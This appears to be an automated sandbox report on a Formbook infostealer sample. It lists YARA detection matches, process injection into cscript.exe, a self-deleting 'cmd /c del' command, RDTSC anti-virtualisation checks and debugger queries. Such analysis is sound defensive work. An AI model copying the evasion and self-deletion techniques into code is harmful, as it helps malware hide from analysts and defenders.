Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_02778C6C	9_2_02778C6C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0278B57A	9_2_0278B57A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_02772D90	9_2_02772D90
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0278C58A	9_2_0278C58A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_02772D88	9_2_02772D88

Source: C:\Windows\SysWOW64\cscript.exe

Code function: String function: 0477B150 appears 32 times

Source: 85vLO1Rpcy.exe, 00000001.00000003.655654489.000000000239F000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 85vLO1Rpcy.exe
Source: 85vLO1Rpcy.exe, 00000002.00000002.719059320.0000000000E60000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamecscript.exe` vs 85vLO1Rpcy.exe
Source: 85vLO1Rpcy.exe, 00000002.00000002.718870614.0000000000C0F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 85vLO1Rpcy.exe

Source: 85vLO1Rpcy.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/0@12/8

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6404:120:WilError_01

Source: 85vLO1Rpcy.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\85vLO1Rpcy.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: 85vLO1Rpcy.exe

ReversingLabs: Detection: 47%

Source: C:\Users\user\Desktop\85vLO1Rpcy.exe

File read: C:\Users\user\Desktop\85vLO1Rpcy.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\85vLO1Rpcy.exe 'C:\Users\user\Desktop\85vLO1Rpcy.exe'
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Process created: C:\Users\user\Desktop\85vLO1Rpcy.exe 'C:\Users\user\Desktop\85vLO1Rpcy.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\85vLO1Rpcy.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Process created: C:\Users\user\Desktop\85vLO1Rpcy.exe 'C:\Users\user\Desktop\85vLO1Rpcy.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\85vLO1Rpcy.exe'	Jump to behavior

Source:	Binary string: cscript.pdbUGP source: 85vLO1Rpcy.exe, 00000002.00000002.719059320.0000000000E60000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.706368480.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: 85vLO1Rpcy.exe, 00000001.00000003.654242589.00000000020F0000.00000004.00000001.sdmp, 85vLO1Rpcy.exe, 00000002.00000002.718159413.0000000000960000.00000040.00000001.sdmp, cscript.exe, 00000009.00000002.917910463.000000000486F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: 85vLO1Rpcy.exe, cscript.exe
Source:	Binary string: cscript.pdb source: 85vLO1Rpcy.exe, 00000002.00000002.719059320.0000000000E60000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.706368480.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\85vLO1Rpcy.exe

Unpacked PE file: 2.2.85vLO1Rpcy.exe.400000.0.unpack .text:ER;.rdata:R; vs .text:ER;

Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 2_2_004062F6 pushfd ; ret	2_2_004062F7
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 2_2_0041B3C5 push eax; ret	2_2_0041B418
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 2_2_004153FC push eax; retf	2_2_0041540B
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 2_2_0041B47C push eax; ret	2_2_0041B482
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 2_2_0041B412 push eax; ret	2_2_0041B418
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 2_2_0041B41B push eax; ret	2_2_0041B482
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 2_2_00415CE7 pushad ; ret	2_2_00415D4B
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 2_2_0041C4EE push 133511A3h; retf	2_2_0041C4F3
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 2_2_00414D71 push ss; iretd	2_2_00414D72
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 2_2_00415D38 pushad ; ret	2_2_00415D4B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047CD0D1 push ecx; ret	9_2_047CD0E4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_027762F6 pushfd ; ret	9_2_027762F7
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_027853FC push eax; retf	9_2_0278540B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0278B3C5 push eax; ret	9_2_0278B418
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0278B47C push eax; ret	9_2_0278B482
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0278B41B push eax; ret	9_2_0278B482
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0278B412 push eax; ret	9_2_0278B418
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0278C4EE push 133511A3h; retf	9_2_0278C4F3
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_02785CE7 pushad ; ret	9_2_02785D4B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_02784D71 push ss; iretd	9_2_02784D72
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_02785D38 pushad ; ret	9_2_02785D4B

Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 00000000027785F4 second address: 00000000027785FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 000000000277898E second address: 0000000002778994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\85vLO1Rpcy.exe

Code function: 2_2_004088C0 rdtsc

2_2_004088C0

Source: C:\Windows\explorer.exe TID: 4596	Thread sleep time: -50000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 6704	Thread sleep time: -42000s >= -30000s			Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cscript.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cscript.exe	Last function: Thread delayed

Source: explorer.exe, 00000005.00000000.689554212.000000000FCDF000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.677883212.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000005.00000000.689491602.000000000FCA3000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATA
Source: explorer.exe, 00000005.00000000.684592280.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.679024096.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.684592280.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.685546854.000000000A9D4000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATA}
Source: explorer.exe, 00000005.00000000.674530269.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000005.00000000.684746061.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000005.00000000.677883212.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.677883212.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000005.00000000.684825933.000000000A784000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 00000005.00000000.677883212.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\85vLO1Rpcy.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\85vLO1Rpcy.exe

Code function: 2_2_004088C0 rdtsc

2_2_004088C0

Source: C:\Users\user\Desktop\85vLO1Rpcy.exe

Code function: 2_2_00409B30 LdrLoadDll,

2_2_00409B30

Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 1_2_020706DA mov eax, dword ptr fs:[00000030h]	1_2_020706DA
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 1_2_0207099F mov eax, dword ptr fs:[00000030h]	1_2_0207099F
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 1_2_020709DE mov eax, dword ptr fs:[00000030h]	1_2_020709DE
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 1_2_02070A1C mov eax, dword ptr fs:[00000030h]	1_2_02070A1C
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Code function: 1_2_020708EE mov eax, dword ptr fs:[00000030h]	1_2_020708EE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0479746D mov eax, dword ptr fs:[00000030h]	9_2_0479746D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04790050 mov eax, dword ptr fs:[00000030h]	9_2_04790050
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04790050 mov eax, dword ptr fs:[00000030h]	9_2_04790050
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0480B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0480B8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0480B8D0 mov ecx, dword ptr fs:[00000030h]	9_2_0480B8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0480B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0480B8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0480B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0480B8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0480B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0480B8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0480B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0480B8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04848CD6 mov eax, dword ptr fs:[00000030h]	9_2_04848CD6
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0478B02A mov eax, dword ptr fs:[00000030h]	9_2_0478B02A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0478B02A mov eax, dword ptr fs:[00000030h]	9_2_0478B02A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0478B02A mov eax, dword ptr fs:[00000030h]	9_2_0478B02A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0478B02A mov eax, dword ptr fs:[00000030h]	9_2_0478B02A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047ABC2C mov eax, dword ptr fs:[00000030h]	9_2_047ABC2C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047F7016 mov eax, dword ptr fs:[00000030h]	9_2_047F7016
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047F7016 mov eax, dword ptr fs:[00000030h]	9_2_047F7016
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047F7016 mov eax, dword ptr fs:[00000030h]	9_2_047F7016
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047F6C0A mov eax, dword ptr fs:[00000030h]	9_2_047F6C0A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047F6C0A mov eax, dword ptr fs:[00000030h]	9_2_047F6C0A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047F6C0A mov eax, dword ptr fs:[00000030h]	9_2_047F6C0A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047F6C0A mov eax, dword ptr fs:[00000030h]	9_2_047F6C0A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048314FB mov eax, dword ptr fs:[00000030h]	9_2_048314FB
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]	9_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]	9_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]	9_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]	9_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]	9_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]	9_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]	9_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]	9_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]	9_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]	9_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]	9_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]	9_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]	9_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]	9_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0484740D mov eax, dword ptr fs:[00000030h]	9_2_0484740D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0484740D mov eax, dword ptr fs:[00000030h]	9_2_0484740D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0484740D mov eax, dword ptr fs:[00000030h]	9_2_0484740D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047F6CF0 mov eax, dword ptr fs:[00000030h]	9_2_047F6CF0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047F6CF0 mov eax, dword ptr fs:[00000030h]	9_2_047F6CF0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047F6CF0 mov eax, dword ptr fs:[00000030h]	9_2_047F6CF0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04844015 mov eax, dword ptr fs:[00000030h]	9_2_04844015
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04844015 mov eax, dword ptr fs:[00000030h]	9_2_04844015
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047AF0BF mov ecx, dword ptr fs:[00000030h]	9_2_047AF0BF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047AF0BF mov eax, dword ptr fs:[00000030h]	9_2_047AF0BF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047AF0BF mov eax, dword ptr fs:[00000030h]	9_2_047AF0BF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0480C450 mov eax, dword ptr fs:[00000030h]	9_2_0480C450
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0480C450 mov eax, dword ptr fs:[00000030h]	9_2_0480C450
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B90AF mov eax, dword ptr fs:[00000030h]	9_2_047B90AF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04832073 mov eax, dword ptr fs:[00000030h]	9_2_04832073
